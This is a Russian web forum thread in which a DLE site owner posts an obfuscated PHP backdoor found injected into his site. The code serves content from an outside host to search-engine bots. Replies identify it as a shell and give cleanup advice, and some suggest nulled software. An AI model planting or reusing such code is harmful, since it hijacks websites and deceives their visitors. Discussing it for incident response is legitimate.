X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> Взламывают Dle
Turbo_Pie
Turbo_Pie
Topic Starter сообщение 23.12.2009, 2:47; Ответить: Turbo_Pie
Сообщение #1


Участник
***

Группа: User
Сообщений: 103
Регистрация: 3.1.2008
Поблагодарили: 10 раз
Репутация:   1  


Всем привет. суть в чем: постоянно взламывают DLE и меняют пароль в админку. Сегодня обнаружил в папке /engine/data/ посторонний файл conect.php и его include в dbconfig.php

В файле conect.php было: (именно с одной n)

<?php $x12="f\151le"; $x13="\x66\x73o\143\153\x6f\x70en"; $x14="\151\155\x70\154\x6fd\x65"; $x15="s\164rp\157\x73";
if($_GET['chek']){echo"\074\x21--\103\x48E\x43\x4b\x312\x33\x312\071\x33\x3712\06387\0621\063\x2d\x2d>";} $x0b = array(); $x0b['ad_Robots_UserAgent']=array('Google','Googlebot','msnbot','Yandex','YaDirectBot');
$x0b['ad_IsRobot']=false; foreach ($x0b['ad_Robots_UserAgent'] as $x0c){if ($x15($_SERVER['HTTP_USER_AGENT'], $x0c)!==false){ $x0b['ad_IsRobot']=true; break;} } $x0d = ''; if($x0b['ad_IsRobot'])
{ $x0d = @$x13("\166\151p\055ba\x73\145\x2e\x77\163", 80, $x0e, $x0f, 8);if(!$x0d){echo "";}
else{ $x10 = @$x12("h\164\x74\160\072\x2f\057vip\055\142ase\x2e\167\x73/\171\141\x6e\144\x65\x78\x2fs\x63a\x6e\056\x70\x68p?ho\x73\x74=$_SERVER[SERVER_NAME]\x26\151\x70\075$_SERVER[REMOTE_ADDR]"); if($x10==true) echo $x14('',$x10); } }
unset($x0b,$x0c,$x11,$x0d); return $x0d;?>



Кто может объяснить, что здесь такое понаписали? Спасибо за информацию!


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Frankie
Frankie
сообщение 23.12.2009, 3:13; Ответить: Frankie
Сообщение #2


Старожил
******

Группа: Active User
Сообщений: 1520
Регистрация: 18.9.2009
Поблагодарили: 320 раз
Репутация:   36  


версия двига 8.2?
Если да, то вам сюда: http://talk.maulnet.ru/topic39018.html

Так же совет от меня лично, через эту дыру получают пароль юзера ID1, создайте себе нового юзера, дайте ему админские права, а c юзера ID1 наоборот все права снимите, так, даже если ID1 опять взломают, то вам ничего не грозит

Сообщение отредактировал Frankie - 23.12.2009, 3:14
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Turbo_Pie
Turbo_Pie
Topic Starter сообщение 23.12.2009, 3:15; Ответить: Turbo_Pie
Сообщение #3


Участник
***

Группа: User
Сообщений: 103
Регистрация: 3.1.2008
Поблагодарили: 10 раз
Репутация:   1  


У меня сетка сателлитов. Там 8.2 и 8.0. и все взламывали. 8.3 тоже недавно начал ставить, там пароли не поменяли, а вот этот файл сунули...


Файл менял на 8.2 ... Фтп доступ вообще закрыт. Через FTP клиенты зайти нельзя.

Сообщение отредактировал Turbo_Pie - 23.12.2009, 3:18


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
saneck08
saneck08
сообщение 23.12.2009, 3:18; Ответить: saneck08
Сообщение #4


Участник
***

Группа: User
Сообщений: 183
Регистрация: 26.12.2008
Поблагодарили: 32 раза
Репутация:   -13  


(Turbo_Pie @ 23.12.2009, 2:15) *
У меня сетка сателлитов. Там 8.2 и 8.0. и все взламывали. 8.3 тоже недавно начал ставить, там пароли не поменяли, а вот этот файл сунули...

проверь права на папки. мня тоже с версией 8.2 взламывали, пока нулл в паблик не пустили на версию 8.3 ...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Turbo_Pie
Turbo_Pie
Topic Starter сообщение 23.12.2009, 3:20; Ответить: Turbo_Pie
Сообщение #5


Участник
***

Группа: User
Сообщений: 103
Регистрация: 3.1.2008
Поблагодарили: 10 раз
Репутация:   1  


(saneck08 @ 23.12.2009, 2:18) *
проверь права на папки. мня тоже с версией 8.2 взламывали, пока нулл в паблик не пустили на версию 8.3 ...



Проверял, вроде нормально...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
life
life
сообщение 23.12.2009, 4:42; Ответить: life
Сообщение #6


Завсегдатай
*****

Группа: Active User
Сообщений: 921
Регистрация: 28.1.2009
Поблагодарили: 147 раз
Репутация:   -4  


это шелл.
выполняется conect.php , и (вероятно!!) меняет пароль админа (может быть скуль запрсом, может ещё чем).
решается просто: удаляйте коннект.пхп , сносите инклуд, меняйте пароль на фтп, меняйте пароль админа, ставите заплатку для 8.2 (если 8.2, и если не стоит), проверяете каждую папку, на инородные файлы (проще из админки антивирусом), могут быть ещё такие шеллы.

Удачи.

Сообщение отредактировал life - 23.12.2009, 4:46
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Frankie
Frankie
сообщение 23.12.2009, 12:13; Ответить: Frankie
Сообщение #7


Старожил
******

Группа: Active User
Сообщений: 1520
Регистрация: 18.9.2009
Поблагодарили: 320 раз
Репутация:   36  


а еще смените двиг на нуллед от мид-тима, остальные сборки выкиньте, они все кривые и дырявые
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
centurion
centurion
сообщение 23.12.2009, 12:15; Ответить: centurion
Сообщение #8


Топовый постер
*******


Группа: Active User
Сообщений: 2831
Регистрация: 10.12.2007
Из: aceweb
Поблагодарили: 1349 раз
Репутация:   308  


В топку такой двиг или версию.
Мало того что парсится контент с движка фришными граберами, так еще и ломают на раз, два, три.
Зачем на нем сайты-то ставить?

Сообщение отредактировал centurion - 23.12.2009, 12:18
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
demon932008
demon932008
сообщение 23.12.2009, 12:47; Ответить: demon932008
Сообщение #9


Пишу тексты :)
*******

Группа: Active User
Сообщений: 3822
Регистрация: 4.12.2008
Из: Украина
Поблагодарили: 940 раз
Репутация:   160  


centurion, вордпресс не лучшеsmile.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
coolurik
coolurik
сообщение 23.12.2009, 13:46; Ответить: coolurik
Сообщение #10


спамер
******

Группа: Banned
Сообщений: 2411
Регистрация: 15.7.2008
Поблагодарили: 1326 раз
Репутация:   183  


centurion, версия 8.2 наверняка, просто обновить нужно вовремя было.


--------------------
спамер
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Услуги по CMS Wordpress, DLE, Joomla!. Правки, ремонт, настройка.
Редактирование и правки. Низкие цены.
143 contex1 65210 Сегодня, 9:07
автор: contex1
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
278 kaartes 102890 14.12.2017, 10:55
автор: kukla
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
15 Nell 1173 13.12.2017, 23:36
автор: Nell
Открытая тема (нет новых ответов) Требуется так сказать оптимизация шаблона DLE
5 Deadman_n 420 2.12.2017, 13:24
автор: Deadman_n
Открытая тема (нет новых ответов) Перенос сайта с DLE на WordPress
3 mdobyshev 874 30.11.2017, 7:29
автор: Nell


 



RSS Текстовая версия Сейчас: 17.12.2017, 18:09
Дизайн